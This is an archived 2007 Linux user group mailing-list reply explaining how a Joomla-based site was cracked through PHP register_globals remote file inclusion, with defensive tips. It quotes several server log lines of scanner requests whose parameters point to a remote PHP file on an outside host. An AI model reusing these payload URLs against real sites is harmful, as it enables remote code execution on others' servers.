Re: PLUG site incident last night

Top Page
Attachments:
Message as email
+ (text/plain)
+ (text/html)
+ (text/plain)
Delete this message
Reply to this message
Author: JD Austin
Date:  
To: Main PLUG discussion list
Subject: Re: PLUG site incident last night
Using url tricks crackers exploit in many types of web applications.
The register_globals feature in php is used to trick the site into using
a different configuration .php file in another location across the net
and run it. It's a trick as old as CGI.
Looking at my logs I see TONS of these types attempts:

    208.31.216.8 - - [01/Jan/2007:08:59:52 -0500] "GET
    /becommunity/community/index.php?pageurl=http://morfeus.us/M.php?&/
    HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:08:59:53 -0500] "GET
    /shoutbox/expanded.php?conf=http://morfeus.us/M.php?&/ HTTP/1.1" 404
    1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:08:59:56 -0500] "GET
    /dotproject/modules/tasks/addedit.php?root_dir=http://morfeus.us/M.php?&
    / HTTP/1.1" 200 176 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:09:00:00 -0500] "GET
    /My_eGallery/public/displayCategory.php?basepath=http://morfeus.us/M.php?&/
    HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:09:02:09 -0500] "GET
    /modules/mod_mainmenu.php?mosConfig_absolute_path=http://morfeus.us/M.
    php?&/ HTTP/1.1" 403 1240 "-" "Morfeus FXXXing Scanner"



It was never an issue with Joomla itself but third party components and
modules coded by people less security minded have been exploited.
com_extcalendar, com_galeria a few others were commonly used to
overwrite the index.php and configuration.php files. From there they'd
use php to create and run shell scripts to do various malicious things.

Components should have this in them somewhere:
defined( '_VALID_MOS' ) or die( 'Restricted access' );

Since Joomla 1.0.11 this issue has been addressed using .htaccess and
re-coding to allow register globals to be turned off. Since Joomla is
used on a wide range of platforms (even windows) they still support the
old register_globals method of variables but try to coerce users into
setting it up right.

I also install mod_security to make that sort of attack stop in it's tracks.

JD

Technomage wrote:
> this may sound like a stupid question on my part (sorry guys, I've been
> working lately, so I haven't kept up): what exactly was cracked on the site
> and how was it done?
>
> details would be greatly appreciated.
>
> thanks.
>
>
> On Monday 01 January 2007 04:29, Jim wrote:
>
>> Edward Norton wrote:
>>
>>> PLUG cracked AGAIN? Not surprising considering you guys wont consider
>>> anything other than a badly coded PHP CMS.
>>>
>> Ed,
>>
>> Apparently you know more about securing a site than the people who run
>> it. At least that's what your message implies. I have an idea. When
>> it's time for the next PLUG meeting, come out of the sewer, show up at
>> the meeting and offer to help secure the site.
>>
> ---------------------------------------------------
> PLUG-discuss mailing list -
> To subscribe, unsubscribe, or to change you mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>

---------------------------------------------------
PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change you mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss